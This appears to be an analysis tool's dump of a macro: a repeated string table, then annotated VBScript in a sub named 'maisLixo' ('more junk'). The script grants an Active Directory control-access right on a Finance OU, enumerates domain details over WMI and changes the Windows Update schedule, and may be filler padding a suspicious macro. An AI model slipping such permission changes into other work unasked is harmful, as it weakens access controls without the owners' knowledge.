    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    LineInstructionMeta Information
    430

    Private Sub maisLixo()

    439

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    440

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    441

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    442

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    443

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    445

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    446

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    447

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    449

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    451

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    452

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    453

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    454

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    455

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    456

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    457

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    458

    objDacl.AddAce objAce

    AddAce

    460

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    462

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    463

    objSDUtil.SetInfo

    SetInfo

    471

    On Error Resume Next

    473

    strComputer = "."

    474

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    477

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    480

    For Each objItem in colItems

    481

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    482

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    483

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    484

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    485

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    486

    Wscript.Echo

    Echo

    487

    Next

    491

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    492

    Set objSettings = objAutoUpdate.Settings

    Settings

    494

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    495

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    497

    objSettings.Save

    Save

    504

    On Error Resume Next

    506

    strComputer = "."

    507

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    510

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    512

    For Each objItem in colItems

    513

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    514

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    515

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    516

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    517

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    519

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    521

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    522

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    523

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    524

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    525

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    526

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    527

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    528

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    529

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    531

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    533

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    534

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    535

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    536

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    537

    Wscript.Echo

    Echo

    538

    Next

    544

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    545

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    546

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    547

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    548

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    550

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    551

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    552

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    554

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    556

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    557

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    558

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    559

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    560

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    561

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    562

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    563

    objDacl.AddAce objAce

    AddAce

    565

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    567

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
